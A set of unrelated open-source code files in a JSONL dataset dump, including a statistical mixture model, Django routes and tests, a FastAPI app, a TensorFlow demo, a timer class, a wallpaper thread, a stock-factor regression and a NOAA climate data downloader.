probs.\n weights_matrix = make_weights_matrix(equal_error_rate,\n feat_ref_foreign,\n feat_ref_eng_expanded)\n # save to global variables\n equal_error_rates[lang] = equal_error_rate\n weights_mats[lang] = DataFrame(weights_matrix,\n index=phonesets[lang],\n columns=eng_phones)\n # save results\n eer_fname = 'equal-error-rates-{}{}-{}.tsv'.format(fname_id, squaremat,\n subj_id)\n equal_error_rates.to_csv(op.join(subj_outdir, eer_fname), sep='\\t')\n for lang, wmat in weights_mats.items():\n fid = '{}-{}{}'.format(lang, fname_id, squaremat)\n wmat_fname = 'eeg-confusion-matrix-{}-{}.tsv'.format(fid, subj_id)\n wmat.to_csv(op.join(subj_outdir, wmat_fname), sep='\\t',\n encoding='utf-8')\n","repo_name":"drammock/eeg-phone-coding","sub_path":"old-stuff/make-confmats-from-classifier-output.py","file_name":"make-confmats-from-classifier-output.py","file_ext":"py","file_size_in_byte":12703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31434301057","text":"from django.urls import path\n\nfrom additional.views import GameCopyrightViewSet, \\\n SongCopyrightViewSet, GameCopyrightItem, SongCopyrightItem\n\nurlpatterns = [\n path('copyrights/game', GameCopyrightViewSet.as_view(\n {\n 'post': 'create',\n 'get': 'list'\n }\n )),\n path('copyrights/game/', GameCopyrightItem.as_view(\n {\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n }\n )),\n path('copyrights/song', SongCopyrightViewSet.as_view(\n {\n 'post': 'create',\n 'get': 'list'\n }\n )),\n path('copyrights/song/', SongCopyrightItem.as_view(\n {\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n }\n ))\n]\n","repo_name":"Aldeshov/youtube.api","sub_path":"additional/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28439771534","text":"import sys\nimport math\nimport numpy as np\nfrom scipy.special import gamma as gamma_func\nfrom scipy.special import gammaln\nfrom scipy.special import polygamma\nfrom scipy.misc import factorial\nimport scipy.stats as spstats\n\n\nclass Model(object):\n\n def __init__(self, N, index, library_size, transcript_abundance=None, theta=[], seed=None, threads=1):\n self.N = N\n self.index = index\n self.delta = None\n self.pZ = []\n self.phi = []\n self.ld = transcript_abundance\n self.theta = theta\n self.seed = seed\n self.threads = threads\n\n self.T = 2\n self.K = 3 # including unknown\n\n # Initialize all Model-specific parameters\n self.initialize_delta(library_size)\n self.initialize_pZ()\n self.get_phi()\n\n def get_kappa_beta(self, theta):\n kappa, beta_12, beta_21, beta_22 = theta\n beta = [[0.0, beta_12],\n [beta_21, beta_22]]\n return kappa, np.array(beta)\n\n def output_states(self, out):\n with open(out, \"w\") as f_out:\n\n # header with parameter values\n f_out.write(\"# k*: %.5f\\n\" % self.theta[0])\n f_out.write(\"# beta: %.5f|%.5f|%.5f\\n\" % tuple(self.theta[1:]))\n \n\n for k, v in self.index.items():\n start, end = v\n for j, (x, y, z, l) in enumerate(zip(self.N[0][start:end], self.N[1][start:end], \n self.pZ[start:end], self.ld[start:end]), 1):\n f_out.write(\"%s\\n\" % \"\\t\".join([str(k), str(j), \n str(x), str(y), \n str(np.argmax(z)),\n \"\\t\".join([\"%.3f\"] * len(z)) % tuple(z),\n \"%.2f\" % l]))\n\n # DONE - deal with (T,K)\n def randomize_theta(self, t, k):\n if self.seed:\n np.random.seed(self.seed)\n self.theta = np.random.random(1+((t*k)-1))\n \n # DONE\n def 
initialize_delta(self, library_size):\n delta = [0.0, 0.0] \n delta[1] = np.log(float(library_size[1])/float(library_size[0]))\n self.delta = np.array(delta)\n\n # DONE\n def initialize_ld(self, transcript_abundance):\n self.ld = np.array(transcript_abundance)\n\n # DONE - deal with (T,K)\n def initialize_pZ(self, alpha=10):\n # dirichlet distribution\n d = spstats.dirichlet(tuple([alpha] * self.K), self.seed)\n self.pZ = d.rvs(self.N.shape[1])\n \n # TOREMOVE\n def calculate_TPM(self):\n ld_V1 = []\n ld_S1 = []\n for i in xrange(len(self.N[0])):\n ld_V1.append(self.N[0][i].sum() / float(len(self.N[0][i])))\n ld_S1.append(self.N[1][i].sum() / float(len(self.N[1][i])))\n \n ld_V1 = np.array(ld_V1)\n ld_S1 = np.array(ld_S1)\n \n TPM_V1 = (10.0**6 * ld_V1)/ld_V1.sum()\n TPM_S1 = (10.0**6 * ld_S1)/ld_S1.sum()\n \n self.TPM = (TPM_V1 + TPM_S1)/2.0\n \n # DONE - ld for every element\n def get_ld(self, theta):\n\n kappa, beta = self.get_kappa_beta(theta)\n \n new_ld = []\n\n N = self.N.sum(axis=0)\n Z = self.pZ[:,0] + self.pZ[:,1]\n\n num_1 = (self.pZ[:,0] * N) - (self.pZ[:,1] * kappa)\n den_1 = 1.0 + np.exp(self.delta[1] + beta[1][0])\n num_2 = (self.pZ[:,1] * N) - (self.pZ[:,0] * kappa)\n den_2 = np.exp(beta[0][1]) + np.exp(self.delta[1] + beta[1][1])\n num_3 = Z + N\n den_3 = den_1 * den_2\n \n for k, (start, end) in sorted(self.index.items()):\n a_i1 = (num_1[start:end].mean()/den_1) + (num_2[start:end].mean()/den_2)\n a_i2 = kappa * (num_3[start:end].mean()/den_3)\n ld = a_i1/2.0 + np.sqrt(np.square(a_i1)/4.0 + a_i2)\n \n new_ld += [ ld for _ in range(end-start) ]\n\n self.ld = np.array(new_ld)\n \n\n # DONE - deal with (T,K)\n def get_phi(self):\n\n phi = np.argmax(self.pZ, axis=1)\n self.phi = np.array([np.count_nonzero(phi == k) for k in xrange(self.K) ]) / float(len(phi))\n \n # DONE\n def model(self, kappa, beta):\n lm = self.log_model(kappa, beta)\n c = np.array([ np.log(np.arange(1, m+1)).sum()\n + np.log(np.arange(1, n+1)).sum() for m, n in zip(self.N[0], self.N[1]) ])\n return np.exp(lm - c)\n\n # DONE - deal with (T, K)\n def log_model(self, kappa, beta):\n \n N = self.N.sum(axis=0)\n lm = []\n \n lld = np.log(self.ld)\n for k in range(self.K-1):\n \n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n \n l = (gammaln(N + kappa) - gammaln(kappa))\n l += kappa * np.log(kappa) \n l += self.N[0] * (lld + self.delta[0] + beta[0][k])\n l += self.N[1] * (lld + self.delta[1] + beta[1][k])\n l -= (N + kappa) * (np.log(c_1K + c_2K + kappa))\n \n lm.append(l)\n return np.array(lm)\n \n\n # DONE - deal with (T, K)\n def first_drvt_log_model_kappa(self, kappa, beta):\n \n N = self.N.sum(axis=0)\n J = []\n for k in range(self.K-1):\n \n pgamma = polygamma(0, N + kappa) - polygamma(0, kappa)\n \n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n \n J_k = pgamma\n J_k += 1.0 + np.log(kappa)\n J_k -= np.log(c_1K + c_2K + kappa)\n J_k -= (N + kappa)/(c_1K + c_2K + kappa)\n \n J.append(J_k)\n \n return np.array(J)\n \n # DONE - deal with (T, K)\n def first_drvt_log_model_beta(self, kappa, beta):\n\n N = self.N.sum(axis=0)\n\n J = np.zeros((self.T * (self.K-1), self.N.shape[1]))\n for t in range(self.T):\n for k in range(self.K-1):\n\n if t != 0 or k != 0:\n \n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n c_TK = self.ld * np.exp(self.delta[t] + beta[t][k])\n\n J_b = self.N[t] - ((N + kappa)*(c_TK)/(c_1K + c_2K + kappa))\n \n 
J[(t*self.T)+k] = J_b\n \n return J\n\n # DONE - deal with (T, K)\n def second_drvt_log_model_kappa_kappa(self, kappa, beta):\n\n N = self.N.sum(axis=0)\n \n H = []\n for k in range(self.K-1):\n \n pgamma = polygamma(1, N + kappa) - polygamma(1, kappa)\n\n c_1K = self.ld * np.exp(self.delta[0] + beta[0][k])\n c_2K = self.ld * np.exp(self.delta[1] + beta[1][k])\n\n num = c_1K + c_2K - N\n denom = c_1K + c_2K + kappa\n \n H_kk = pgamma \n H_kk += 1.0/kappa\n H_kk -= 1.0/denom\n H_kk -= num/np.square(denom)\n\n H.append(H_kk)\n \n return np.array(H)\n\n # DONE - deal with (T, K)\n def second_drvt_log_model_beta_kappa(self, kappa, beta):\n\n TK = []\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n TK.append((t, k))\n\n N = self.N.sum(axis=0)\n\n H = []\n for u in range(len(TK)):\n t, k = TK[u]\n c_TK = self.ld * np.exp(self.delta[t] + beta[t][k])\n\n num_1 = c_TK\n num_2 = c_TK * (N + kappa)\n den_1 = kappa\n for t_ in xrange(self.T):\n den_1 += self.ld * np.exp(self.delta[t_] + beta[t_][k])\n \n H_bk = -(num_1/den_1) + (num_2/np.square(den_1))\n \n H.append(H_bk)\n \n return np.array(H)\n\n # DONE - deal with (T, K)\n def second_drvt_log_model_beta_beta(self, kappa, beta):\n\n TK = []\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n TK.append((t, k))\n\n N = self.N.sum(axis=0)\n H = np.zeros((len(TK), len(TK), self.N.shape[1]))\n \n for u in range(len(TK)):\n for v in range(u+1):\n\n t1, k1 = TK[u]\n t2, k2 = TK[v]\n \n if k1 == k2:\n if t1 != t2:\n \n c_TK = np.square(self.ld) * np.exp(self.delta[t1] + beta[t1][k1] + self.delta[t2] + beta[t2][k2])\n num_1 = (N + kappa) * c_TK\n den_1 = kappa\n for t_ in xrange(self.T):\n den_1 += self.ld * np.exp(self.delta[t_] + beta[t_][k1])\n \n H[u, v] = -(num_1/np.square(den_1))\n \n elif t1 == t2:\n \n c_TK = self.ld * np.exp(self.delta[t1] + beta[t1][k1])\n num_1 = (N + kappa) * c_TK\n den_1 = kappa\n for t_ in xrange(self.T):\n den_1 += self.ld * np.exp(self.delta[t_] + beta[t_][k1])\n num_2 = self.ld * np.exp(self.delta[t2] + beta[t2][k2]) - den_1\n \n H[u, v] = (num_1 * num_2)/(np.square(den_1))\n\n return H\n\n # DONE - deal with (T,K)\n def log_expected(self, theta):\n \n kappa, beta = self.get_kappa_beta(theta)\n\n log_total = 0.0\n \n lm = self.log_model(kappa, beta)\n\n for k in range(self.K-1):\n log_total += (self.pZ[:,k] * lm[k]).sum()\n \n return -log_total\n\n # DONE - deal with (T,K)\n def log_jacobian(self, theta):\n \n kappa, beta = self.get_kappa_beta(theta)\n log_total = [0.0, 0.0, 0.0, 0.0]\n \n J_k = self.first_drvt_log_model_kappa(kappa, beta)\n J_b = self.first_drvt_log_model_beta(kappa, beta)\n \n # Kappa (1 value)\n for k in range(self.K-1):\n log_total[0] += (self.pZ[:,k] * J_k[k]).sum()\n \n # Beta (k x t values)\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n log_total[(t*2)+k] += (self.pZ[:,k] * J_b[(t*2)+k]).sum()\n \n log_total = np.array(log_total)\n \n # DEBUG\n # print \"Jacobian %s\" % -log_total\n return -log_total\n\n # DONE - deal with (T,K)\n def log_hessian(self, theta):\n\n kappa, beta = self.get_kappa_beta(theta)\n \n p = 1 + ((self.T * (self.K-1)) - 1)\n log_total = np.zeros((p,p)).tolist()\n \n # Kappa Kappa\n H_kk = self.second_drvt_log_model_kappa_kappa(kappa, beta)\n for k in range(self.K-1):\n log_total[0][0] += (self.pZ[:,k] * H_kk[k]).sum()\n\n # Beta\n TK = []\n for t in range(self.T):\n for k in range(self.K-1):\n if t != 0 or k != 0:\n TK.append((t,k))\n\n # Beta Kappa\n H_bk = 
self.second_drvt_log_model_beta_kappa(kappa, beta)\n for u in range(len(TK)):\n t, k = TK[u]\n d2FdBTKdK = (self.pZ[:,k] * H_bk[((t*self.T)+k)-1]).sum()\n log_total[u+1][0] += d2FdBTKdK\n log_total[0][u+1] += d2FdBTKdK\n\n \n # Beta Beta\n H_bb = self.second_drvt_log_model_beta_beta(kappa, beta)\n for u in range(len(TK)):\n for v in range(u+1):\n t1, k1 = TK[u]\n t2, k2 = TK[v]\n d2FdBTKdBTK = (self.pZ[:,k1] * H_bb[u,v]).sum()\n \n if u == v:\n log_total[u+1][v+1] += d2FdBTKdBTK\n else:\n log_total[u+1][v+1] += d2FdBTKdBTK\n log_total[v+1][u+1] += d2FdBTKdBTK\n\n log_total = np.array(log_total)\n return -log_total\n","repo_name":"ouyang-lab/JPGM-HMM","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74424213368","text":"from django.test import TestCase\n\nfrom guided_redaction.redact.classes.ImageMasker import ImageMasker\nimport numpy as np\n\nclass ImageMaskerTestCase(TestCase):\n\n def setUp(self):\n pass\n\n def test_image_masker_masks_3channel_image_with_black(self):\n image_masker = ImageMasker()\n\n cv2_image = np.zeros((200, 200, 3), np.uint8) \n cv2_image[:,:] = (0, 123, 0)\n\n num_greens = np.count_nonzero(np.all(cv2_image == (0, 123,0), axis=-1))\n num_blacks = np.count_nonzero(np.all(cv2_image == (0, 0, 0), axis=-1))\n self.assertEquals(num_greens, 40000)\n self.assertEquals(num_blacks, 0)\n\n areas_to_redact = [\n {\n 'start': (30, 40),\n 'end': (70, 80),\n },\n ]\n\n masked_image = image_masker.mask_all_regions(\n cv2_image,\n areas_to_redact,\n mask_method='black_rectangle'\n )\n\n green_pixels = np.all(masked_image == (0, 123,0), axis=-1)\n black_pixels = np.all(masked_image == (0, 0, 0), axis=-1)\n\n num_greens = np.count_nonzero(green_pixels)\n num_blacks = np.count_nonzero(black_pixels)\n\n # we supplied a box to redact that is 41x41 - the ranges are inclusive. 
\n self.assertEquals(num_greens, 38319)\n self.assertEquals(num_blacks, 1681)\n\n start_y = np.where(black_pixels)[0][0] # numpy coordinages are reversed, so x is 1, y is 0\n start_x = np.where(black_pixels)[1][0]\n self.assertEquals(start_x, 30)\n self.assertEquals(start_y, 40)\n\n end_y = np.where(black_pixels)[0][-1]\n end_x = np.where(black_pixels)[1][-1] \n self.assertEquals(end_x, 70)\n self.assertEquals(end_y, 80)\n","repo_name":"dcaulton/guided_redaction","sub_path":"api/guided_redaction/redact/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12929293361","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom contextlib import asynccontextmanager\nfrom db_models import Base\nfrom database import engine\nfrom routers import users, items\n\ndescription = \"\"\"\nExample API to demonstrate distinct permissioned routes\n\"\"\"\n\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n Base.metadata.create_all(bind=engine)\n yield\n\n\napp = FastAPI(\n title='Permissioned routes example API',\n description=description,\n version=\"1.0.0\",\n docs_url=\"/v1/documentation\",\n redoc_url=\"/v1/redocs\",\n lifespan=lifespan\n)\n\napp.include_router(users.router)\napp.include_router(items.router)\n\nif __name__ == '__main__':\n uvicorn.run(app, host=\"0.0.0.0\", port=9999)\n","repo_name":"chrisK824/fastapi-rbac-example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"9885149478","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef add_layer(inputs, in_size, out_size, activation_func):\n Weights = tf.Variable(tf.random.normal([in_size,out_size]))\n biases = tf.Variable(tf.zeros([1,out_size]) + 0.1)\n Wx_plus_biases = tf.matmul(inputs, Weights) + biases\n if activation_func is None:\n result = Wx_plus_biases\n else:\n result = activation_func(Wx_plus_biases)\n return result\n\nx_data = np.linspace(-1, 1, 100)[:, np.newaxis]\n# print(x_data)\nnoise = np.random.normal(0,0.05,x_data.shape)\n# print(noise)\ny_data = np.square(x_data) - 0.5 + noise\n\n# plt.figure()\n# plt.scatter(x_data, y_data)\n# plt.show()\n\n\nxs = tf.placeholder(tf.float32, [None, 1])\nys = tf.placeholder(tf.float32, [None, 1])\n\nl1 = add_layer(xs, 1, 10, activation_func=tf.nn.tanh)\nprediction = add_layer(l1, 10, 1, activation_func=None)\n\nloss = tf.reduce_mean(tf.square(ys - prediction))\ntrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for step in range(101):\n sess.run(train_step, feed_dict={xs:x_data, ys:y_data})\n if step % 20 == 0:\n print(step, sess.run(loss, feed_dict={xs:x_data, ys:y_data}))\n plt.plot(x_data, sess.run(prediction, feed_dict={xs: x_data}), 'r-')\n plt.show()\n","repo_name":"Huxn/tensorflow","sub_path":"src/add_layer_test(一般神经网络添加隐藏层demo).py","file_name":"add_layer_test(一般神经网络添加隐藏层demo).py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24362315154","text":"#!/usr/bin/python3\n\n\"\"\"\n\n timer.py\n\n COSC364 RIP Assignment\n\n Date: 02/05/2019\n\n Written by:\n - Will Cowper (81163265)\n - Jesse Sheehan (53366509)\n \n\"\"\"\n\nimport time\n\nclass Timer:\n\n def __init__(self, 
period, callback):\n        \"\"\"\n        Creates a new Timer with a period and a callback.\n        \"\"\"\n        self.__period = period\n        self.__callback = callback\n        self.__started = False\n        self.__startedTime = 0\n        self.__paused = False\n        self.__pausedTime = 0\n        self.__updateTime = 0\n\n    def start(self):\n        \"\"\"\n        Starts the timer.\n        \"\"\"\n        if not self.__started:\n            t = time.time()\n            self.__started = True\n            self.__startedTime = t\n            self.__paused = False\n            self.__pausedTime = 0\n            self.__updateTime = t\n\n    def stop(self):\n        \"\"\"\n        Stops the timer.\n        \"\"\"\n        if self.__started:\n            self.__started = False\n            self.__startedTime = 0\n            self.__paused = False\n            self.__pausedTime = 0\n            self.__updateTime = 0\n\n    def reset(self):\n        \"\"\"\n        Resets the timer.\n        \"\"\"\n        if self.__started:\n            self.stop()\n            self.start()\n\n    def pause(self):\n        \"\"\"\n        Pauses the timer.\n        \"\"\"\n        if self.__started and not self.__paused:\n            self.__paused = True\n            self.__pausedTime = time.time() - self.__startedTime\n            self.__startedTime = 0\n\n    def resume(self):\n        \"\"\"\n        Resumes the timer.\n        \"\"\"\n        if self.__started and self.__paused:\n            self.__startedTime = time.time() - self.__pausedTime\n            self.__paused = False\n            self.__pausedTime = 0\n\n    def update(self):\n        \"\"\"\n        Updates the timer. May call its callback.\n        \"\"\"\n        if self.__started and not self.__paused:\n            t = time.time()\n            dt = t - self.__updateTime\n            if dt > self.__period:\n                self.__updateTime = t\n                self.__callback(dt)\n    \n    def trigger(self):\n        \"\"\"\n        Forcefully call the callback.\n        \"\"\"\n        if self.__started and not self.__paused:\n            t = time.time()\n            dt = t - self.__updateTime\n            self.__updateTime = t\n            self.__callback(dt)\n\n    def getElapsed(self):\n        \"\"\"\n        Returns the time elapsed in seconds.\n        \"\"\"\n        if self.__started:\n            if self.__paused:\n                return self.__pausedTime\n            else:\n                return time.time() - self.__startedTime\n        return 0.0\n\n    def isStarted(self):\n        \"\"\"\n        Returns True if the timer has been started.\n        \n        >>> t = Timer(10, None)\n        >>> t.isStarted()\n        False\n        >>> t.start()\n        >>> t.isStarted()\n        True\n        >>> t.stop()\n        >>> t.isStarted()\n        False\n        \"\"\"\n        return self.__started\n\n    def isPaused(self):\n        \"\"\"\n        Returns True if the timer has been paused.\n        \n        >>> t = Timer(10, None)\n        >>> t.isPaused()\n        False\n        >>> t.start()\n        >>> t.isPaused()\n        False\n        >>> t.pause()\n        >>> t.isPaused()\n        True\n        >>> t.resume()\n        >>> t.isPaused()\n        False\n        >>> t.stop()\n        >>> t.isPaused()\n        False\n        >>> t.start()\n        >>> t.pause()\n        >>> t.isPaused()\n        True\n        >>> t.stop()\n        >>> t.isPaused()\n        False\n        \"\"\"\n        return self.__paused and self.__started\n\n    def __str__(self):\n        \"\"\"\n        Returns a string representation of the timer.\n        \"\"\"\n        return \"Timer <period: {0}, started: {1}, paused: {2}, elapsed: {3}>\".format(self.__period, self.__started, self.__paused, self.getElapsed())\n\n    def __repr__(self):\n        \"\"\"\n        Returns a string representation of the timer.\n        \"\"\"\n        return self.__str__()\n\n# run doctests\nif __name__ == \"__main__\":\n    import doctest\n    doctest.testmod()\n","repo_name":"jpsheehan/cosc364-rip2","sub_path":"src/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27559476993","text":"import ctypes\r\nimport time\r\nimport os\r\n\r\nctypes.windll.kernel32.SetConsoleTitleW(\"View Counter\")\r\n\r\nos.system(\"cls\")\r\ni = 0\r\n\r\nwhile 0 == 0:\r\n    print(\"Getting Views\")\r\n    os.system(\"views.js > views\")\r\n    f = open(\"views\", \"r\")\r\n    views = f.read()\r\n    f.close()\r\n    \r\n    print(\"Making 
Image\")\r\n os.system(\"image.bat \" + views)\r\n \r\n print(\"Uploading Img\")\r\n os.system(\"update.js\")\r\n \r\n print(\"Done! \" + str(i))\r\n print(\"60sec Timeout\")\r\n time.sleep(60)\r\n os.system(\"cls\")\r\n i+=1","repo_name":"KitKatNaomi/Neocity-View-Counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34301249253","text":"from earth_wallpaper.utils.setWallpaper import set_wallpaper\nfrom earth_wallpaper.utils.platformInfo import PlatformInfo\nfrom earth_wallpaper import interfaces\nfrom PySide6.QtCore import QThread\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_class_name(name: str):\n for i in dir(interfaces):\n if getattr(interfaces, i).name() == name:\n return i\n\n\nclass Thread(QThread):\n\n def __init__(self, name):\n super(Thread, self).__init__()\n self.class_name = get_class_name(name)\n self.flag = True\n\n def run(self):\n logger.info(f\"启动{self.class_name}子线程\")\n x = getattr(interfaces, self.class_name)()\n if x.name() == \"本地壁纸\":\n img_path = x.run()\n set_wallpaper(img_path)\n else:\n img = x.run()\n if self.flag:\n PlatformInfo().check()\n with open(x.download_path, \"wb\") as f:\n f.write(img)\n set_wallpaper(x.download_path)\n logger.info(f\"{self.class_name}子线程运行完成\")\n\n def stop(self):\n self.flag = False\n logger.info(f\"{self.class_name}子线程被中断,等待线程结束\")\n","repo_name":"Pylogmon/earth_wallpaper","sub_path":"earth_wallpaper/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"77"} +{"seq_id":"41129101405","text":"\r\n\"\"\"\r\n由于并未达到原文中的数值,所以之后会重新检查,看看算式能否进一步提升,因此,并未写出很集成的模块。\r\n回归计算参考 : https://github.com/tirthajyoti/Machine-Learning-with-Python/blob/master/Regression/Linear_Regression_Methods.ipynb\r\n\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy import stats\r\n\r\nfrom factor_test_monthly import compute_num_months, compute_factor_return_series, compute_return_T_test, compute_5_factor_model\r\n\r\nfrom fm import process_bar\r\n\r\nimport time\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef forecast_combination(X, y):\r\n fc_params = []\r\n for i in range(X.shape[1]):\r\n if i == 0: # 对于常数项\r\n # result = sm.OLS(y, X[:, i]).fit()\r\n # fc_params.append(result.params[0])\r\n fc_params.append(stats.linregress(y, X[:, 1])[1])\r\n # fc_params.append(stats.linregress(X[:, 1], y)[1])\r\n else:\r\n fc_params.append(stats.linregress(y, X[:, i])[0])\r\n # fc_params.append(stats.linregress(X[:, i], y)[0])\r\n return fc_params\r\n\r\nif __name__ == \"__main__\":\r\n data = pd.read_csv('./data.csv')\r\n begin_month = 200203\r\n time_length = 190\r\n\r\n months = compute_num_months(begin_month, time_length)\r\n\r\n # 转为按时间排序\r\n data = data.sort_values(by = \"TRDMNT\")\r\n data = data.reset_index(drop = True)\r\n\r\n # 然后对于每一个时间节点,对于74个因子计算一次,得到其参数,\r\n # 在这里,每个时间对应的PCA,但在计算回报的时候应该用上一个时间点的数值\r\n for i in range(time_length):\r\n month = months[i]\r\n data_atmonth = data[data.TRDMNT == month]\r\n X = data_atmonth.iloc[:, 18:92].values\r\n # X = data_atmonth.iloc[:, 92:166].values\r\n X = np.column_stack((np.ones(X.shape[0]), X)) #先加上常数看看\r\n # y = data_atmonth.retx.values\r\n y = data_atmonth.reta.values\r\n pls_point = forecast_combination(X, y)\r\n if i == 0:\r\n pls_matrix = pls_point\r\n else:\r\n pls_matrix = 
np.vstack((pls_matrix, pls_point)) # 该矩阵和时间的对应关系为: 时间对应的那一行用到了下一个月的回报,\r\n # 所以应该移动\r\n\r\n T = 12\r\n dates = data.TRDMNT.tolist()\r\n data_matrix = data.iloc[:, 18:92].values\r\n # data_matrix = data.iloc[:, 92:166].values\r\n pls_data = []\r\n for i in range(int(data_matrix.shape[0])):\r\n date = dates[i]\r\n if date >= months[T]:\r\n now_pos = int((date - 200200)/100) * 12 + date%100- 3\r\n pls_params = np.sum(pls_matrix[now_pos - T:now_pos, :], axis=0) / T\r\n X = pls_params.T\r\n y = np.array([1] + data_matrix[i,:].tolist())\r\n pls_point = stats.linregress(y, X)[0]\r\n # pls_point = stats.linregress(X, y)[0]\r\n pls_data.append(pls_point)\r\n else:\r\n pls_data.append(0)\r\n process_bar(i, data_matrix.shape[0])\r\n\r\n data[\"pls\"] = pls_data\r\n new_panel = data.loc[:, ['stkid', 'TRDMNT', 'retx', 'pls']]\r\n # new_panel.to_csv('./pls.csv', mode='w', header=True)\r\n\r\n FACTOR = 'pls'\r\n begin_month = 200203 # 200203 178; 200306, 163;200406, 151;200506, 139; 200506, 139\r\n time_length = 178\r\n\r\n months = compute_num_months(begin_month, time_length)\r\n # 计算该因子对应的多空组合回报率表格\r\n result = compute_factor_return_series(new_panel, FACTOR, begin_month, time_length)\r\n\r\n print(\"Factor Name:\", FACTOR)\r\n the_return, t, Minus = compute_return_T_test(result)\r\n\r\n the_return2, t2 = compute_5_factor_model(Minus, months)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cheng-zi-ya/Firm-Characteristics-and-Chinese-Stock-Market","sub_path":"pls.py","file_name":"pls.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"77"} +{"seq_id":"2042494878","text":"\n# =============================================================================\n# climoDL.py \n#\n# Author: mdgrossi\n# Modified: Nov 1, 2023\n#\n# This script retrieves NOAA CO-OPS observational data, both atmospheric and\n# oceanic, for the specified station. If historical data already exists\n# locally, it is updated with the most recently available observations.\n#\n# TO EXECUTE:\n# python climoDL.py -s \"Virginia Key, FL\" -i \"8723214\" -u \"english\" -t \"lst\" -d \"MHHW\" --hr 3 --day 2 \n#\n# =============================================================================\n\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport plotly.io as pio\nimport argparse\nimport os\nimport numpy as np\nimport pandas as pd\nfrom pyclimo import Data\nfrom noaa_coops import Station\nfrom scipy.optimize import curve_fit\n\n# -----------------------------------------------------------------------------\n# FUNCTIONS\ndef parse_args():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description='Function control parameters.',\n prog='climoDL',\n usage='%(prog)s [arguments]')\n parser.add_argument('-s', '--station', metavar='station', type=str,\n help='Desired name of station. 
Used for saving data.',\n default=None)\n parser.add_argument('-i', '--id', metavar='stationid', type=str,\n help='Tide station number from which to retrieve data.',\n default=None)\n parser.add_argument('-o', '--outdir', metavar='outdir', type=str,\n help='Directory to save data to.',\n default=None)\n parser.add_argument('-u', '--units', metavar='units', type=str,\n help='Data units, either \"metric\" or \"english\".',\n default='english')\n parser.add_argument('-t', '--timezone', metavar='timezone', type=str,\n help='Timezone, either \"gmt\", \"lst\", or \"lst_ldt\".',\n default='lst')\n parser.add_argument('-d', '--datum', metavar='datum', type=str,\n help='Tidal datum for water level data. Options: '+\n '\"STND\", \"MHHW\", \"MHW\", \"MTL\", \"MSL\", \"MLW\", '+\n '\"MLLW\", \"NAVD\"',\n default='MHHW')\n parser.add_argument('--hr', metavar='hr_threshold', type=int,\n help='Max number of hours of data that can be missing.',\n default=3)\n parser.add_argument('--day', metavar='day_threshold', type=int,\n help='Max number of days of data that can be missing.',\n default=2)\n parser.add_argument('-r', '--redownload', action='store_true',\n help='Force redownload of historical data.')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Print statuses to screen.')\n return parser.parse_args()\n\ndef ploy_fit(data, degree=5, print_coefs=False, plot=False):\n \"\"\"Fit polynomial curve to data\"\"\"\n # Fit curve to data\n y = data.values\n x = np.arange(0, len(y))\n coef = np.polyfit(x, y, degree)\n polyfun = np.poly1d(coef)\n if print_coefs:\n print(f'Coefficients: {coef}')\n if plot:\n fig, ax = plt.subplots(1, 1, figsize=(12,5))\n ax.plot(data, label=data.name)\n ax.plot(polyfun(x), color='red', label=f'{degree}D Polynomial')\n ax.legend(loc='best')\n plt.show()\n else:\n return polyfun(x)\n\ndef cos_fit(data, plot=False):\n \"\"\"Fit cosine curve to data\"\"\"\n X = np.arange(0, len(data))/len(data)\n\n # Initial parameter values\n guess_freq = 